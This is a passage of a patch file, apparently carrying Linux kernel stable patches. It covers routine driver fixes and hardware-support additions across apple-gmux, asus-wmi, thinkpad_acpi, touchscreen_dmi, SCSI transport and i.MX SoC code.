+-#define GMUX_PORT_VERSION_RELEASE	0x06
+-#define GMUX_PORT_SWITCH_DISPLAY	0x10
+-#define GMUX_PORT_SWITCH_GET_DISPLAY	0x11
+-#define GMUX_PORT_INTERRUPT_ENABLE	0x14
+-#define GMUX_PORT_INTERRUPT_STATUS	0x16
+-#define GMUX_PORT_SWITCH_DDC		0x28
+-#define GMUX_PORT_SWITCH_EXTERNAL	0x40
+-#define GMUX_PORT_SWITCH_GET_EXTERNAL	0x41
+-#define GMUX_PORT_DISCRETE_POWER	0x50
+-#define GMUX_PORT_MAX_BRIGHTNESS	0x70
+-#define GMUX_PORT_BRIGHTNESS		0x74
+-#define GMUX_PORT_VALUE			0xc2
+-#define GMUX_PORT_READ			0xd0
+-#define GMUX_PORT_WRITE			0xd4
+-
+-#define GMUX_MIN_IO_LEN			(GMUX_PORT_BRIGHTNESS + 4)
+-
+ #define GMUX_INTERRUPT_ENABLE		0xff
+ #define GMUX_INTERRUPT_DISABLE		0x00
+ 
+@@ -249,23 +226,6 @@ static void gmux_write32(struct apple_gmux_data *gmux_data, int port,
+ 		gmux_pio_write32(gmux_data, port, val);
+ }
+ 
+-static bool gmux_is_indexed(struct apple_gmux_data *gmux_data)
+-{
+-	u16 val;
+-
+-	outb(0xaa, gmux_data->iostart + 0xcc);
+-	outb(0x55, gmux_data->iostart + 0xcd);
+-	outb(0x00, gmux_data->iostart + 0xce);
+-
+-	val = inb(gmux_data->iostart + 0xcc) |
+-		(inb(gmux_data->iostart + 0xcd) << 8);
+-
+-	if (val == 0x55aa)
+-		return true;
+-
+-	return false;
+-}
+-
+ /**
+  * DOC: Backlight control
+  *
+@@ -605,60 +565,43 @@ static int gmux_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ 	int ret = -ENXIO;
+ 	acpi_status status;
+ 	unsigned long long gpe;
++	bool indexed = false;
++	u32 version;
+ 
+ 	if (apple_gmux_data)
+ 		return -EBUSY;
+ 
++	if (!apple_gmux_detect(pnp, &indexed)) {
++		pr_info("gmux device not present\n");
++		return -ENODEV;
++	}
++
+ 	gmux_data = kzalloc(sizeof(*gmux_data), GFP_KERNEL);
+ 	if (!gmux_data)
+ 		return -ENOMEM;
+ 	pnp_set_drvdata(pnp, gmux_data);
+ 
+ 	res = pnp_get_resource(pnp, IORESOURCE_IO, 0);
+-	if (!res) {
+-		pr_err("Failed to find gmux I/O resource\n");
+-		goto err_free;
+-	}
+-
+ 	gmux_data->iostart = res->start;
+ 	gmux_data->iolen = resource_size(res);
+ 
+-	if (gmux_data->iolen < GMUX_MIN_IO_LEN) {
+-		pr_err("gmux I/O region too small (%lu < %u)\n",
+-		       gmux_data->iolen, GMUX_MIN_IO_LEN);
+-		goto err_free;
+-	}
+-
+ 	if (!request_region(gmux_data->iostart, gmux_data->iolen,
+ 			    "Apple gmux")) {
+ 		pr_err("gmux I/O already in use\n");
+ 		goto err_free;
+ 	}
+ 
+-	/*
+-	 * Invalid version information may indicate either that the gmux
+-	 * device isn't present or that it's a new one that uses indexed
+-	 * io
+-	 */
+-
+-	ver_major = gmux_read8(gmux_data, GMUX_PORT_VERSION_MAJOR);
+-	ver_minor = gmux_read8(gmux_data, GMUX_PORT_VERSION_MINOR);
+-	ver_release = gmux_read8(gmux_data, GMUX_PORT_VERSION_RELEASE);
+-	if (ver_major == 0xff && ver_minor == 0xff && ver_release == 0xff) {
+-		if (gmux_is_indexed(gmux_data)) {
+-			u32 version;
+-			mutex_init(&gmux_data->index_lock);
+-			gmux_data->indexed = true;
+-			version = gmux_read32(gmux_data,
+-				GMUX_PORT_VERSION_MAJOR);
+-			ver_major = (version >> 24) & 0xff;
+-			ver_minor = (version >> 16) & 0xff;
+-			ver_release = (version >> 8) & 0xff;
+-		} else {
+-			pr_info("gmux device not present\n");
+-			ret = -ENODEV;
+-			goto err_release;
+-		}
++	if (indexed) {
++		mutex_init(&gmux_data->index_lock);
++		gmux_data->indexed = true;
++		version = gmux_read32(gmux_data, GMUX_PORT_VERSION_MAJOR);
++		ver_major = (version >> 24) & 0xff;
++		ver_minor = (version >> 16) & 0xff;
++		ver_release = (version >> 8) & 0xff;
++	} else {
++		ver_major = gmux_read8(gmux_data, GMUX_PORT_VERSION_MAJOR);
++		ver_minor = gmux_read8(gmux_data, GMUX_PORT_VERSION_MINOR);
++		ver_release = gmux_read8(gmux_data, GMUX_PORT_VERSION_RELEASE);
+ 	}
+ 	pr_info("Found gmux version %d.%d.%d [%s]\n", ver_major, ver_minor,
+ 		ver_release, (gmux_data->indexed ? "indexed" : "classic"));
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index c685a705b73dd..cb15acdf14a30 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -121,6 +121,10 @@ static struct quirk_entry quirk_asus_tablet_mode = {
+ 	.tablet_switch_mode = asus_wmi_lid_flip_rog_devid,
+ };
+ 
++static struct quirk_entry quirk_asus_ignore_fan = {
++	.wmi_ignore_fan = true,
++};
++
+ static int dmi_matched(const struct dmi_system_id *dmi)
+ {
+ 	pr_info("Identified laptop model '%s'\n", dmi->ident);
+@@ -473,6 +477,15 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
++	{
++		.callback = dmi_matched,
++		.ident = "ASUS VivoBook E410MA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "E410MA"),
++		},
++		.driver_data = &quirk_asus_ignore_fan,
++	},
+ 	{},
+ };
+ 
+@@ -511,6 +524,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x30, { KEY_VOLUMEUP } },
+ 	{ KE_KEY, 0x31, { KEY_VOLUMEDOWN } },
+ 	{ KE_KEY, 0x32, { KEY_MUTE } },
++	{ KE_KEY, 0x33, { KEY_SCREENLOCK } },
+ 	{ KE_KEY, 0x35, { KEY_SCREENLOCK } },
+ 	{ KE_KEY, 0x38, { KEY_PROG3 } }, /* Armoury Crate */
+ 	{ KE_KEY, 0x40, { KEY_PREVIOUSSONG } },
+@@ -544,6 +558,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x7D, { KEY_BLUETOOTH } }, /* Bluetooth Enable */
+ 	{ KE_KEY, 0x7E, { KEY_BLUETOOTH } }, /* Bluetooth Disable */
+ 	{ KE_KEY, 0x82, { KEY_CAMERA } },
++	{ KE_KEY, 0x85, { KEY_CAMERA } },
+ 	{ KE_KEY, 0x86, { KEY_PROG1 } }, /* MyASUS Key */
+ 	{ KE_KEY, 0x88, { KEY_RFKILL  } }, /* Radio Toggle Key */
+ 	{ KE_KEY, 0x8A, { KEY_PROG1 } }, /* Color enhancement mode */
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index f051b21653d61..02bf286924183 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -225,6 +225,7 @@ struct asus_wmi {
+ 
+ 	int tablet_switch_event_code;
+ 	u32 tablet_switch_dev_id;
++	bool tablet_switch_inverted;
+ 
+ 	enum fan_type fan_type;
+ 	enum fan_type gpu_fan_type;
+@@ -493,6 +494,13 @@ static bool asus_wmi_dev_is_present(struct asus_wmi *asus, u32 dev_id)
+ }
+ 
+ /* Input **********************************************************************/
++static void asus_wmi_tablet_sw_report(struct asus_wmi *asus, bool value)
++{
++	input_report_switch(asus->inputdev, SW_TABLET_MODE,
++			    asus->tablet_switch_inverted ? !value : value);
++	input_sync(asus->inputdev);
++}
++
+ static void asus_wmi_tablet_sw_init(struct asus_wmi *asus, u32 dev_id, int event_code)
+ {
+ 	struct device *dev = &asus->platform_device->dev;
+@@ -501,7 +509,7 @@ static void asus_wmi_tablet_sw_init(struct asus_wmi *asus, u32 dev_id, int event
+ 	result = asus_wmi_get_devstate_simple(asus, dev_id);
+ 	if (result >= 0) {
+ 		input_set_capability(asus->inputdev, EV_SW, SW_TABLET_MODE);
+-		input_report_switch(asus->inputdev, SW_TABLET_MODE, result);
++		asus_wmi_tablet_sw_report(asus, result);
+ 		asus->tablet_switch_dev_id = dev_id;
+ 		asus->tablet_switch_event_code = event_code;
+ 	} else if (result == -ENODEV) {
+@@ -534,6 +542,7 @@ static int asus_wmi_input_init(struct asus_wmi *asus)
+ 	case asus_wmi_no_tablet_switch:
+ 		break;
+ 	case asus_wmi_kbd_dock_devid:
++		asus->tablet_switch_inverted = true;
+ 		asus_wmi_tablet_sw_init(asus, ASUS_WMI_DEVID_KBD_DOCK, NOTIFY_KBD_DOCK_CHANGE);
+ 		break;
+ 	case asus_wmi_lid_flip_devid:
+@@ -573,10 +582,8 @@ static void asus_wmi_tablet_mode_get_state(struct asus_wmi *asus)
+ 		return;
+ 
+ 	result = asus_wmi_get_devstate_simple(asus, asus->tablet_switch_dev_id);
+-	if (result >= 0) {
+-		input_report_switch(asus->inputdev, SW_TABLET_MODE, result);
+-		input_sync(asus->inputdev);
+-	}
++	if (result >= 0)
++		asus_wmi_tablet_sw_report(asus, result);
+ }
+ 
+ /* dGPU ********************************************************************/
+@@ -2243,7 +2250,9 @@ static int asus_wmi_fan_init(struct asus_wmi *asus)
+ 	asus->fan_type = FAN_TYPE_NONE;
+ 	asus->agfn_pwm = -1;
+ 
+-	if (asus_wmi_dev_is_present(asus, ASUS_WMI_DEVID_CPU_FAN_CTRL))
++	if (asus->driver->quirks->wmi_ignore_fan)
++		asus->fan_type = FAN_TYPE_NONE;
++	else if (asus_wmi_dev_is_present(asus, ASUS_WMI_DEVID_CPU_FAN_CTRL))
+ 		asus->fan_type = FAN_TYPE_SPEC83;
+ 	else if (asus_wmi_has_agfn_fan(asus))
+ 		asus->fan_type = FAN_TYPE_AGFN;
+diff --git a/drivers/platform/x86/asus-wmi.h b/drivers/platform/x86/asus-wmi.h
+index 65316998b898a..a478ebfd34dfa 100644
+--- a/drivers/platform/x86/asus-wmi.h
++++ b/drivers/platform/x86/asus-wmi.h
+@@ -38,6 +38,7 @@ struct quirk_entry {
+ 	bool store_backlight_power;
+ 	bool wmi_backlight_set_devstate;
+ 	bool wmi_force_als_set;
++	bool wmi_ignore_fan;
+ 	enum asus_wmi_tablet_switch_mode tablet_switch_mode;
+ 	int wapf;
+ 	/*
+diff --git a/drivers/platform/x86/simatic-ipc.c b/drivers/platform/x86/simatic-ipc.c
+index ca76076fc706a..b3622419cd1a4 100644
+--- a/drivers/platform/x86/simatic-ipc.c
++++ b/drivers/platform/x86/simatic-ipc.c
+@@ -46,7 +46,8 @@ static struct {
+ 	{SIMATIC_IPC_IPC427D, SIMATIC_IPC_DEVICE_427E, SIMATIC_IPC_DEVICE_NONE},
+ 	{SIMATIC_IPC_IPC427E, SIMATIC_IPC_DEVICE_427E, SIMATIC_IPC_DEVICE_427E},
+ 	{SIMATIC_IPC_IPC477E, SIMATIC_IPC_DEVICE_NONE, SIMATIC_IPC_DEVICE_427E},
+-	{SIMATIC_IPC_IPC427G, SIMATIC_IPC_DEVICE_227G, SIMATIC_IPC_DEVICE_227G},
++	{SIMATIC_IPC_IPCBX_39A, SIMATIC_IPC_DEVICE_227G, SIMATIC_IPC_DEVICE_227G},
++	{SIMATIC_IPC_IPCPX_39A, SIMATIC_IPC_DEVICE_NONE, SIMATIC_IPC_DEVICE_227G},
+ };
+ 
+ static int register_platform_devices(u32 station_id)
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 4e95d2243161a..7fd735c67a8e6 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10500,8 +10500,7 @@ static int dytc_profile_set(struct platform_profile_handler *pprof,
+ 			if (err)
+ 				goto unlock;
+ 		}
+-	}
+-	if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
++	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
+ 		err = dytc_command(DYTC_SET_COMMAND(DYTC_FUNCTION_PSC, perfmode, 1), &output);
+ 		if (err)
+ 			goto unlock;
+@@ -10529,14 +10528,16 @@ static void dytc_profile_refresh(void)
+ 			err = dytc_command(DYTC_CMD_MMC_GET, &output);
+ 		else
+ 			err = dytc_cql_command(DYTC_CMD_GET, &output);
+-	} else if (dytc_capabilities & BIT(DYTC_FC_PSC))
++		funcmode = DYTC_FUNCTION_MMC;
++	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
+ 		err = dytc_command(DYTC_CMD_GET, &output);
+-
++		/* Check if we are PSC mode, or have AMT enabled */
++		funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
++	}
+ 	mutex_unlock(&dytc_mutex);
+ 	if (err)
+ 		return;
+ 
+-	funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+ 	convert_dytc_to_profile(funcmode, perfmode, &profile);
+ 	if (profile != dytc_current_profile) {
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index baae3120efd05..f00995390fdfe 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -264,6 +264,23 @@ static const struct ts_dmi_data connect_tablet9_data = {
+ 	.properties     = connect_tablet9_props,
+ };
+ 
++static const struct property_entry csl_panther_tab_hd_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 1),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 20),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1526),
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-y"),
++	PROPERTY_ENTRY_BOOL("touchscreen-swapped-x-y"),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-csl-panther-tab-hd.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	{ }
++};
++
++static const struct ts_dmi_data csl_panther_tab_hd_data = {
++	.acpi_name      = "MSSL1680:00",
++	.properties     = csl_panther_tab_hd_props,
++};
++
+ static const struct property_entry cube_iwork8_air_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 1),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 3),
+@@ -1124,6 +1141,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Tablet 9"),
+ 		},
+ 	},
++	{
++		/* CSL Panther Tab HD */
++		.driver_data = (void *)&csl_panther_tab_hd_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "CSL Computer GmbH & Co. KG"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CSL Panther Tab HD"),
++		},
++	},
+ 	{
+ 		/* CUBE iwork8 Air */
+ 		.driver_data = (void *)&cube_iwork8_air_data,
+diff --git a/drivers/reset/Kconfig b/drivers/reset/Kconfig
+index de176c2fbad96..2a52c990d4fec 100644
+--- a/drivers/reset/Kconfig
++++ b/drivers/reset/Kconfig
+@@ -257,7 +257,7 @@ config RESET_SUNXI
+ 
+ config RESET_TI_SCI
+ 	tristate "TI System Control Interface (TI-SCI) reset driver"
+-	depends on TI_SCI_PROTOCOL || COMPILE_TEST
++	depends on TI_SCI_PROTOCOL || (COMPILE_TEST && TI_SCI_PROTOCOL=n)
+ 	help
+ 	  This enables the reset driver support over TI System Control Interface
+ 	  available on some new TI's SoCs. If you wish to use reset resources
+diff --git a/drivers/reset/reset-uniphier-glue.c b/drivers/reset/reset-uniphier-glue.c
+index 146fd5d45e99d..15abac9fc72c0 100644
+--- a/drivers/reset/reset-uniphier-glue.c
++++ b/drivers/reset/reset-uniphier-glue.c
+@@ -47,7 +47,6 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	struct uniphier_glue_reset_priv *priv;
+ 	struct resource *res;
+-	resource_size_t size;
+ 	int i, ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -60,7 +59,6 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	size = resource_size(res);
+ 	priv->rdata.membase = devm_ioremap_resource(dev, res);
+ 	if (IS_ERR(priv->rdata.membase))
+ 		return PTR_ERR(priv->rdata.membase);
+@@ -96,7 +94,7 @@ static int uniphier_glue_reset_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&priv->rdata.lock);
+ 	priv->rdata.rcdev.owner = THIS_MODULE;
+-	priv->rdata.rcdev.nr_resets = size * BITS_PER_BYTE;
++	priv->rdata.rcdev.nr_resets = resource_size(res) * BITS_PER_BYTE;
+ 	priv->rdata.rcdev.ops = &reset_simple_ops;
+ 	priv->rdata.rcdev.of_node = dev->of_node;
+ 	priv->rdata.active_low = true;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 699b07abb6b0b..02fa3c00dcccf 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -714,7 +714,7 @@ static int hisi_sas_init_device(struct domain_device *device)
+ 		int_to_scsilun(0, &lun);
+ 
+ 		while (retry-- > 0) {
+-			rc = sas_clear_task_set(device, lun.scsi_lun);
++			rc = sas_abort_task_set(device, lun.scsi_lun);
+ 			if (rc == TMF_RESP_FUNC_COMPLETE) {
+ 				hisi_sas_release_task(hisi_hba, device);
+ 				break;
+@@ -1334,7 +1334,7 @@ static void hisi_sas_refresh_port_id(struct hisi_hba *hisi_hba)
+ 				device->linkrate = phy->sas_phy.linkrate;
+ 
+ 			hisi_hba->hw->setup_itct(hisi_hba, sas_dev);
+-		} else
++		} else if (!port->port_attached)
+ 			port->id = 0xff;
+ 	}
+ }
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index 4dbf51e2623ad..f6da34850af9d 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -5850,7 +5850,7 @@ static int hpsa_scsi_host_alloc(struct ctlr_info *h)
+ {
+ 	struct Scsi_Host *sh;
+ 
+-	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(h));
++	sh = scsi_host_alloc(&hpsa_driver_template, sizeof(struct ctlr_info));
+ 	if (sh == NULL) {
+ 		dev_err(&h->pdev->dev, "scsi_host_alloc failed\n");
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
+index f473c002fa4d6..bf834e72595a3 100644
+--- a/drivers/scsi/scsi_transport_iscsi.c
++++ b/drivers/scsi/scsi_transport_iscsi.c
+@@ -1677,6 +1677,13 @@ static const char *iscsi_session_state_name(int state)
+ 	return name;
+ }
+ 
++static char *iscsi_session_target_state_name[] = {
++	[ISCSI_SESSION_TARGET_UNBOUND]   = "UNBOUND",
++	[ISCSI_SESSION_TARGET_ALLOCATED] = "ALLOCATED",
++	[ISCSI_SESSION_TARGET_SCANNED]   = "SCANNED",
++	[ISCSI_SESSION_TARGET_UNBINDING] = "UNBINDING",
++};
++
+ int iscsi_session_chkready(struct iscsi_cls_session *session)
+ {
+ 	int err;
+@@ -1786,9 +1793,13 @@ static int iscsi_user_scan_session(struct device *dev, void *data)
+ 		if ((scan_data->channel == SCAN_WILD_CARD ||
+ 		     scan_data->channel == 0) &&
+ 		    (scan_data->id == SCAN_WILD_CARD ||
+-		     scan_data->id == id))
++		     scan_data->id == id)) {
+ 			scsi_scan_target(&session->dev, 0, id,
+ 					 scan_data->lun, scan_data->rescan);
++			spin_lock_irqsave(&session->lock, flags);
++			session->target_state = ISCSI_SESSION_TARGET_SCANNED;
++			spin_unlock_irqrestore(&session->lock, flags);
++		}
+ 	}
+ 
+ user_scan_exit:
+@@ -1961,31 +1972,41 @@ static void __iscsi_unbind_session(struct work_struct *work)
+ 	struct iscsi_cls_host *ihost = shost->shost_data;
+ 	unsigned long flags;
+ 	unsigned int target_id;
++	bool remove_target = true;
+ 
+ 	ISCSI_DBG_TRANS_SESSION(session, "Unbinding session\n");
+ 
+ 	/* Prevent new scans and make sure scanning is not in progress */
+ 	mutex_lock(&ihost->mutex);
+ 	spin_lock_irqsave(&session->lock, flags);
+-	if (session->target_id == ISCSI_MAX_TARGET) {
++	if (session->target_state == ISCSI_SESSION_TARGET_ALLOCATED) {
++		remove_target = false;
++	} else if (session->target_state != ISCSI_SESSION_TARGET_SCANNED) {
+ 		spin_unlock_irqrestore(&session->lock, flags);
+ 		mutex_unlock(&ihost->mutex);
+-		goto unbind_session_exit;
++		ISCSI_DBG_TRANS_SESSION(session,
++			"Skipping target unbinding: Session is unbound/unbinding.\n");
++		return;
+ 	}
+ 
++	session->target_state = ISCSI_SESSION_TARGET_UNBINDING;
+ 	target_id = session->target_id;
+ 	session->target_id = ISCSI_MAX_TARGET;
+ 	spin_unlock_irqrestore(&session->lock, flags);
+ 	mutex_unlock(&ihost->mutex);
+ 
+-	scsi_remove_target(&session->dev);
++	if (remove_target)
++		scsi_remove_target(&session->dev);
+ 
+ 	if (session->ida_used)
+ 		ida_free(&iscsi_sess_ida, target_id);
+ 
+-unbind_session_exit:
+ 	iscsi_session_event(session, ISCSI_KEVENT_UNBIND_SESSION);
+ 	ISCSI_DBG_TRANS_SESSION(session, "Completed target removal\n");
++
++	spin_lock_irqsave(&session->lock, flags);
++	session->target_state = ISCSI_SESSION_TARGET_UNBOUND;
++	spin_unlock_irqrestore(&session->lock, flags);
+ }
+ 
+ static void __iscsi_destroy_session(struct work_struct *work)
+@@ -2062,6 +2083,9 @@ int iscsi_add_session(struct iscsi_cls_session *session, unsigned int target_id)
+ 		session->ida_used = true;
+ 	} else
+ 		session->target_id = target_id;
++	spin_lock_irqsave(&session->lock, flags);
++	session->target_state = ISCSI_SESSION_TARGET_ALLOCATED;
++	spin_unlock_irqrestore(&session->lock, flags);
+ 
+ 	dev_set_name(&session->dev, "session%u", session->sid);
+ 	err = device_add(&session->dev);
+@@ -4369,6 +4393,19 @@ iscsi_session_attr(def_taskmgmt_tmo, ISCSI_PARAM_DEF_TASKMGMT_TMO, 0);
+ iscsi_session_attr(discovery_parent_idx, ISCSI_PARAM_DISCOVERY_PARENT_IDX, 0);
+ iscsi_session_attr(discovery_parent_type, ISCSI_PARAM_DISCOVERY_PARENT_TYPE, 0);
+ 
++static ssize_t
++show_priv_session_target_state(struct device *dev, struct device_attribute *attr,
++			char *buf)
++{
++	struct iscsi_cls_session *session = iscsi_dev_to_session(dev->parent);
++
++	return sysfs_emit(buf, "%s\n",
++			iscsi_session_target_state_name[session->target_state]);
++}
++
++static ISCSI_CLASS_ATTR(priv_sess, target_state, S_IRUGO,
++			show_priv_session_target_state, NULL);
++
+ static ssize_t
+ show_priv_session_state(struct device *dev, struct device_attribute *attr,
+ 			char *buf)
+@@ -4471,6 +4508,7 @@ static struct attribute *iscsi_session_attrs[] = {
+ 	&dev_attr_sess_boot_target.attr,
+ 	&dev_attr_priv_sess_recovery_tmo.attr,
+ 	&dev_attr_priv_sess_state.attr,
++	&dev_attr_priv_sess_target_state.attr,
+ 	&dev_attr_priv_sess_creator.attr,
+ 	&dev_attr_sess_chap_out_idx.attr,
+ 	&dev_attr_sess_chap_in_idx.attr,
+@@ -4584,6 +4622,8 @@ static umode_t iscsi_session_attr_is_visible(struct kobject *kobj,
+ 		return S_IRUGO | S_IWUSR;
+ 	else if (attr == &dev_attr_priv_sess_state.attr)
+ 		return S_IRUGO;
++	else if (attr == &dev_attr_priv_sess_target_state.attr)
++		return S_IRUGO;
+ 	else if (attr == &dev_attr_priv_sess_creator.attr)
+ 		return S_IRUGO;
+ 	else if (attr == &dev_attr_priv_sess_target_id.attr)
+diff --git a/drivers/soc/imx/imx8mp-blk-ctrl.c b/drivers/soc/imx/imx8mp-blk-ctrl.c
+index 0e3b6ba22f943..0f13853901dfe 100644
+--- a/drivers/soc/imx/imx8mp-blk-ctrl.c
++++ b/drivers/soc/imx/imx8mp-blk-ctrl.c
+@@ -212,7 +212,7 @@ static void imx8mp_hdmi_blk_ctrl_power_on(struct imx8mp_blk_ctrl *bc,
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_LCDIF:
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL0,
+-				BIT(7) | BIT(16) | BIT(17) | BIT(18) |
++				BIT(16) | BIT(17) | BIT(18) |
+ 				BIT(19) | BIT(20));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(11));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_RESET_CTL0,
+@@ -241,6 +241,7 @@ static void imx8mp_hdmi_blk_ctrl_power_on(struct imx8mp_blk_ctrl *bc,
+ 		regmap_set_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(1));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_HDMI_TX_PHY:
++		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL0, BIT(7));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(22) | BIT(24));
+ 		regmap_set_bits(bc->regmap, HDMI_RTX_RESET_CTL0, BIT(12));
+ 		regmap_clear_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(3));
+@@ -270,7 +271,7 @@ static void imx8mp_hdmi_blk_ctrl_power_off(struct imx8mp_blk_ctrl *bc,
+ 				  BIT(4) | BIT(5) | BIT(6));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(11));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL0,
+-				  BIT(7) | BIT(16) | BIT(17) | BIT(18) |
++				  BIT(16) | BIT(17) | BIT(18) |
+ 				  BIT(19) | BIT(20));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_PAI:
+@@ -298,6 +299,7 @@ static void imx8mp_hdmi_blk_ctrl_power_off(struct imx8mp_blk_ctrl *bc,
+ 	case IMX8MP_HDMIBLK_PD_HDMI_TX_PHY:
+ 		regmap_set_bits(bc->regmap, HDMI_TX_CONTROL0, BIT(3));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_RESET_CTL0, BIT(12));
++		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL0, BIT(7));
+ 		regmap_clear_bits(bc->regmap, HDMI_RTX_CLK_CTL1, BIT(22) | BIT(24));
+ 		break;
+ 	case IMX8MP_HDMIBLK_PD_HDCP:
+@@ -590,7 +592,6 @@ static int imx8mp_blk_ctrl_probe(struct platform_device *pdev)
+ 			ret = PTR_ERR(domain->power_dev);
+ 			goto cleanup_pds;
+ 		}
+-		dev_set_name(domain->power_dev, "%s", data->name);
+ 
+ 		domain->genpd.name = data->name;
+ 		domain->genpd.power_on = imx8mp_blk_ctrl_power_on;
+diff --git a/drivers/soc/imx/soc-imx8m.c b/drivers/soc/imx/soc-imx8m.c
+index 28144c699b0c3..32ed9dc88e455 100644
+--- a/drivers/soc/imx/soc-imx8m.c
++++ b/drivers/soc/imx/soc-imx8m.c
+@@ -66,8 +66,8 @@ static u32 __init imx8mq_soc_revision(void)
+ 	ocotp_base = of_iomap(np, 0);
+ 	WARN_ON(!ocotp_base);
+ 	clk = of_clk_get_by_name(np, NULL);
+-	if (!clk) {
+-		WARN_ON(!clk);
++	if (IS_ERR(clk)) {
++		WARN_ON(IS_ERR(clk));
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/soc/qcom/cpr.c b/drivers/soc/qcom/cpr.c
+index e9b854ed1bdfd..144ea68e0920a 100644
+--- a/drivers/soc/qcom/cpr.c
++++ b/drivers/soc/qcom/cpr.c
+@@ -1708,12 +1708,16 @@ static int cpr_probe(struct platform_device *pdev)
+ 
+ 	ret = of_genpd_add_provider_simple(dev->of_node, &drv->pd);
+ 	if (ret)
+-		return ret;
++		goto err_remove_genpd;
+ 
+ 	platform_set_drvdata(pdev, drv);
+ 	cpr_debugfs_init(drv);
+ 
+ 	return 0;
++
++err_remove_genpd:
++	pm_genpd_remove(&drv->pd);
++	return ret;
+ }
+ 
+ static int cpr_remove(struct platform_device *pdev)
+diff --git a/drivers/spi/spi-cadence-xspi.c b/drivers/spi/spi-cadence-xspi.c
+index 9e187f9c6c95e..d28b8bd5b70bc 100644
+--- a/drivers/spi/spi-cadence-xspi.c
++++ b/drivers/spi/spi-cadence-xspi.c
+@@ -177,7 +177,10 @@
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_DCNT_H, \
+ 		((op)->data.nbytes >> 16) & 0xffff) | \
+-	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, (op)->dummy.nbytes * 8))
++	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, \
++		  (op)->dummy.buswidth != 0 ? \
++		  (((op)->dummy.nbytes * 8) / (op)->dummy.buswidth) : \
++		  0))
+ 
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op, chipsel) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R4_BANK, chipsel) | \
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
